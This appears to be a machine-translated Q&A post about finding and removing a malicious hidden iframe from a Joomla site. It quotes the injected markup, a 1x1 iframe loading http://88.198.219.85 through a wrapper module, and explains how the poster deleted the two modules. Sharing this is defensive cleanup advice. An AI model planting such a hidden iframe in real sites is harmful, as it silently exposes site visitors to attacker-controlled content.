Joomla恶意iFrame删除IP 88.198.219.85

时间:2013-02-24 15:26:51

标签: security iframe joomla

如果您发现您的joomla页面加载速度非常慢并且已经意识到它可能是由恶意iFrame引起的,请参阅下面的答案。

1 个答案:

答案 0 :(得分:0)

在我的网站上,我有这段代码:

<div class="module">
            <div>
                <div>
                    <div>
                                            <script language="javascript" type="text/javascript">
    function iFrameHeight() {
        var h = 0;
        if ( !document.all ) {
            h = document.getElementById('blockrandom').contentDocument.height;
            document.getElementById('blockrandom').style.height = h + 60 + 'px';
        } else if( document.all ) {
            h = document.frames('blockrandom').document.body.scrollHeight;
            document.all.blockrandom.style.height = h + 20 + 'px';
        }
    }
</script>

<iframe onload="iFrameHeight()" id="blockrandom"
    name=""
    src="http://88.198.219.85"
    width="1"
    height="1"
    scrolling="auto"
    align="top"
    frameborder="0"
    class="wrapper">
    No Iframes</iframe>                 </div>
                </div>
            </div>
        </div>
            <div class="module">
            <div>
                <div>
                    <div>
                                            <script language="javascript" type="text/javascript">
    function iFrameHeight() {
        var h = 0;
        if ( !document.all ) {
            h = document.getElementById('blockrandom').contentDocument.height;
            document.getElementById('blockrandom').style.height = h + 60 + 'px';
        } else if( document.all ) {
            h = document.frames('blockrandom').document.body.scrollHeight;
            document.all.blockrandom.style.height = h + 20 + 'px';
        }
    }
</script>

<iframe onload="iFrameHeight()" id="blockrandom"
    name=""
    src="http://88.198.219.85"
    width="1"
    height="1"
    scrolling="auto"
    align="top"
    frameborder="0"
    class="wrapper">
    No Iframes</iframe>                 </div>
                </div>
            </div>
        </div>




    </div>    

    <!-- TOP BANNER PART END --> 

我能够删除它的唯一方法是简单地进入Joomla Admin - &gt;模块和按“顶部”位置过滤,产生两个名为“包装器”的模块是mod_wrapper类型,指向88.198.219.85。

所以,希望这有助于某人,因为我在互联网上找不到任何帮助,除了这个(未解决的)有同样问题的人http://forum.joomla.org/viewtopic.php?f=428&t=773730